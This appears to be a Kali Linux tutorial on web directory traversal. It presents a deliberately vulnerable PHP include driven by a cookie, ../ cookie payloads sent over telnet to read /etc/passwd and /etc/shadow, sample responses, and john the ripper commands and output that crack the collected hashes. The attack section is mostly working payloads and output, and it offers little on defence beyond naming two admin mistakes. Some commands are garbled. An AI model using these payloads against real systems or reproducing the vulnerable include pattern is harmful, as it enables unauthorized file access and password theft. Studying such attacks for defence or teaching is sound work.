Kali Linux: Web Directory Traversal Vulnerability (en)
Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-supplied file names, such as characters representing "traverse to parent directory" passed to file APIs.
The goal of this attack is to use misconfigured applications to gain unauthorized access to the file system. This attack exploits the lack of security (although the software acts exactly as it should) differently from exploiting bugs in code.
Directory traversal is also known as ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also considered canonicalization attacks.
Here is a simple example of a vulnerable application in PHP,
<?php
$template = 'red.php';
if (isset($_COOKIE['TEMPLATE']))
$template = $_COOKIE['TEMPLATE'];
include ("/home/users/phpguru/templates/" . $template);
?>
The application could be named, for example, vulnerable.php. Placed under the web folder /var/www/html/vulnerable.php
An attack against this system can be done using the following HTTP request, if you are having trouble you can use
telnet ip-address-server 80
enter/type one by one the sentences below,
GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd Cookie: TEMPLATE=../../../../../../../../../etc/shadow
Response from ../../etc/passwd approximately:
HTTP/1.1 200 OK Date: Fri, 01 Jun 2018 23:21:52 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 2164 Connection: close Content-Type: text/html; charset=UTF-8 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin .. .. etc
The repeated ../ characters after /home/users/phpguru/templates/ cause include() to traverse to the root directory, then include the Unix password file /etc/passwd.
The /etc/passwd file is typically used for directory traversal examples, and indeed is often used by crackers trying to break in.
On modern Linux/Unix systems, the /etc/passwd file does not contain passwords. Passwords are in the shadow file, which is usually only accessible by root. If the server admin is somewhat careless, and changes permissions, for example,
sudo su chmod 644 /etc/shadow
then the command ../../etc/shadow will yield, for example,
HTTP/1.1 200 OK Date: Fri, 01 Jun 2018 23:26:47 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 1767 Connection: close Content-Type: text/html; charset=UTF-8 root:!:17273:0:99999:7::: daemon:*:16911:0:99999:7::: bin:*:16911:0:99999:7::: sys:*:16911:0:99999:7::: sync:*:16911:0:99999:7::: games:*:16911:0:99999:7::: man:*:16911:0:99999:7::: lp:*:16911:0:99999:7::: mail:*:16911:0:99999:7::: news:*:16911:0:99999:7::: uucp:*:16911:0:99999:7::: .. .. etc
Collect both outputs, for example, output of /etc/password in passwd.txt output of /etc/shadow in shadow.txt with these two files then we can crack using john
unshadow passwd.txt shadow.txt > mypasswd john mypasswd
The result will be passwords cracked, approximately
Created directory: /root/.john Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 6 password hashes with 6 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Press 'q' or Ctrl-C to abort, almost any other key for status 123456 (redi) 123456 (krida) 123456 (onno) 123456 (pangtni) 123456 (kasum) 123456 (dansatsiber) 6g 0:00:00:07 DONE 2/3 (2018-06-02 06:32) 0.7894g/s 669.7p/s 711.8c/s 711.8C/s 123456..green Use the "--show" option to display all of the cracked passwords reliably
Admin Mistakes
- Introducing vulnerable PHP
- A critical admin mistake is typing
sudo su chmod 644 /etc/shadow